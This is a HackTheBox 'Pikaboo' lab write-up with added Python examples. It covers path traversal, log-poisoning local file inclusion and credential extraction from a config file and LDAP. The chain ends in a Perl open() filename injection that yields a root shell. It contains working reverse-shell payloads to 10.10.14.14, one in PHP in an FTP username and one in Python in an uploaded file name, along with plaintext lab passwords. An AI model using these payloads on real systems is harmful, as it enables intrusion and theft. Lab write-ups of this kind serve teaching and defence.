HackTheBox – Pikaboo
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A -v -T4 -Pn 10.10.10.249
┌──(rootkali)-[/home/kali/Downloads]
└─# wfuzz -u http://10.10.10.249/admin../FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 --hc 404,401,403
The fuzzing turns up one interesting directory, server-status. The admin../ prefix is an off-by-slash path traversal through the reverse proxy's /admin location, which is why paths outside the admin area are reachable this way at all.
Opening server-status in the browser gives some useful information (shown in the image below), including the admin_staging path.
http://10.10.10.249/admin../server-status/
http://10.10.10.249/admin../admin_staging/
The page parameter of admin_staging/index.php includes whatever file it is given (a local file inclusion), so the next step is to read /var/log/vsftpd.log through it. vsftpd logs every login attempt together with the username that was supplied, which makes the log a place where we can plant PHP and then have index.php include it.
http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 4444
┌──(rootkali)-[/home/kali/Downloads]
└─# ftp 10.10.10.249
Name (10.10.10.249:kali): <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'"); ?>
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log
www-data@pikaboo:/var/www/html/admin_staging$ cd /home
www-data@pikaboo:/home$ ls
www-data@pikaboo:/home$ cd pwnmeow
www-data@pikaboo:/home/pwnmeow$ ls
www-data@pikaboo:/home/pwnmeow$ cat user.txt
www-data@pikaboo:/home/pwnmeow$ cd ..
www-data@pikaboo:/home$ cd ..
www-data@pikaboo:/$ ls
www-data@pikaboo:/$ cd opt
www-data@pikaboo:/opt$ ls
www-data@pikaboo:/opt$ cd pokeapi
www-data@pikaboo:/opt/pokeapi$ ls
www-data@pikaboo:/opt/pokeapi$ grep -iRl 'password'
Reading through the files that mention a password, config/settings.py has an LDAP section with a bind DN and its password, which can be used to query the directory.
www-data@pikaboo:/opt/pokeapi$ cat config/settings.py
"PASSWORD": "J~42%W?PFHl]g"
www-data@pikaboo:/opt/pokeapi$ ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' -b 'dc=pikaboo,dc=htb'
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==
The double colon after userPassword is LDIF's marker for a base64-encoded value; decoding it gives the password in the clear:
_G0tT4_C4tcH_'3m_4lL!_
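Parsing the ldapsearch output and decoding the base64 attribute, as an added Python example rather than code from the write-up. The LDIF below is constructed in the shape of the output above: only the homeDirectory and userPassword values for pwnmeow are the ones the page shows, the other attributes and the second entry are made up to exercise the parser.

```python
"""Added example (not from the original write-up): parsing LDIF output from
ldapsearch and decoding base64 ('::') attribute values such as userPassword.
SAMPLE_LDIF is constructed; only pwnmeow's homeDirectory and userPassword
come from the write-up."""
import base64


def parse_ldif(text: str) -> list:
    """Parse LDIF into a list of entries, each a dict attr -> [values].
    Handles 'attr: value', 'attr:: base64' (decoded to str when it is valid
    UTF-8, else kept as bytes), folded continuation lines and comments."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:      # folded line: join to previous
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)

    entries, current = [], {}
    for line in unfolded:
        if not line.strip():                      # blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        name, _, rest = line.partition(":")
        if rest.startswith(":"):                  # '::' marks a base64 value
            value = base64.b64decode(rest[1:].strip())
            try:
                value = value.decode("utf-8")
            except UnicodeDecodeError:
                pass
        elif rest.startswith("<"):                # ':<' URL reference, skipped here
            continue
        else:
            value = rest.strip()
        current.setdefault(name, []).append(value)
    if current:
        entries.append(current)
    return entries


def find_password(text: str, uid: str):
    """userPassword of the entry whose uid matches, or None."""
    for entry in parse_ldif(text):
        if uid in entry.get("uid", []):
            return entry.get("userPassword", [None])[0]
    return None


def password_scheme(value: str) -> str:
    """A stored value like '{SSHA}...' is a hash, not the password; only a
    value without a {SCHEME} prefix can be used directly as a credential."""
    if value.startswith("{") and "}" in value:
        return value[1:value.index("}")]
    return "plaintext"


# Constructed LDIF; the second entry's value decodes to "{SSHA}constructed".
SAMPLE_LDIF = """\
dn: uid=pwnmeow,ou=users,dc=pikaboo,dc=htb
objectClass: inetOrgPerson
uid: pwnmeow
homeDirectory: /home/pwnmeow
description: FTP account used
  by the CSV import job
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==

dn: cn=binduser,ou=users,dc=pikaboo,dc=htb
cn: binduser
uid: binduser
userPassword:: e1NTSEF9Y29uc3RydWN0ZWQ=
"""

if __name__ == "__main__":
    pw = find_password(SAMPLE_LDIF, "pwnmeow")
    print(pw, password_scheme(pw))
```

The scheme check matters in practice: a directory that stores userPassword as {SSHA} or {CRYPT} hands you a hash to crack, not a credential to reuse, and the bind account's read access to userPassword at all is the misconfiguration worth reporting.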
┌──(rootkali)-[/home/kali/Downloads]
└─# ftp 10.10.10.249
username pwnmeow
password _G0tT4_C4tcH_'3m_4lL!_
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvp 4040
ftp> cd versions
ftp> put "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.14\",4040));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';.csv"
The file name is the exploit: a root-owned job on the box periodically picks up the CSV files in versions with a Perl script that opens them by name with two-argument open(), and Perl treats a name that begins with | as a command to pipe into rather than a file to read, so the Python reverse shell runs as root on the next pass (the ; ends the command before the .csv suffix). Note that ftp's put with a single argument uses that string as the local file name as well, so a local file with exactly this name has to exist before the upload. Within a few minutes the listener on port 4040 receives a root shell.
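The upload name from the last step, built and checked in Python, as an added example that is not part of the original write-up. It also includes the defender-side check: a scan of a drop directory for names that Perl's two-argument open() would parse as a mode or pipe instead of a path. The directory listing is constructed; the reverse-shell command is the one from the put line above, with the listener address assumed from the lab.

```python
"""Added example (not from the original write-up): the FTP upload name that
abuses Perl's two-argument open(), and a check that flags such names in a
drop directory. SAMPLE_LISTING is constructed."""
import re


def pipe_open_filename(command: str, suffix: str = ".csv") -> str:
    """Perl's two-argument open(FH, $name) treats a name beginning with '|'
    as a shell command to pipe into instead of a file to open. A job that
    opens every *.csv it finds by name will therefore run `command`. The
    ';' keeps the suffix out of the command; newlines are refused because
    the name travels on a single FTP STOR line."""
    if "\n" in command or "\r" in command:
        raise ValueError("command must be a single line")
    return f"|{command};{suffix}"


# Leading or trailing forms that two-argument open() parses as a mode or a
# pipe (after stripping whitespace): '|cmd', 'cmd|', '<f', '>f', '>>f',
# '+<f', '+>f'. The bare name '-' means STDIN/STDOUT.
MAGIC_OPEN_NAME = re.compile(r"^\s*(\||\+?[<>]{1,2})|\|\s*$")


def flag_magic_open_names(names) -> list:
    """Return the names that Perl's two-argument open() would not treat as
    a plain path. Run it over an FTP drop directory before a script consumes
    it, or better, fix the consumer to use three-argument open(FH, '<', $n)."""
    return [n for n in names if n.strip() == "-" or MAGIC_OPEN_NAME.search(n)]


# The command from the put line above; 10.10.14.14:4040 is the assumed listener.
REVERSE_SHELL = (
    "python3 -c 'import os,pty,socket;s=socket.socket();"
    's.connect(("10.10.14.14",4040));'
    "[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
)

SAMPLE_LISTING = [                                 # constructed directory listing
    "pokemon_v1.csv",
    "2021-07-06.csv",
    pipe_open_filename(REVERSE_SHELL),
    "export.csv |",
    ">>overwrite.csv",
]

if __name__ == "__main__":
    for name in flag_magic_open_names(SAMPLE_LISTING):
        print("would be executed or redirected, not opened:", name)
```

A name flagged by this check that ends in .csv is still a valid upload as far as vsftpd is concerned; the FTP server is not the component at fault, the Perl consumer is, and the fix is the three-argument open form, which never interprets the name.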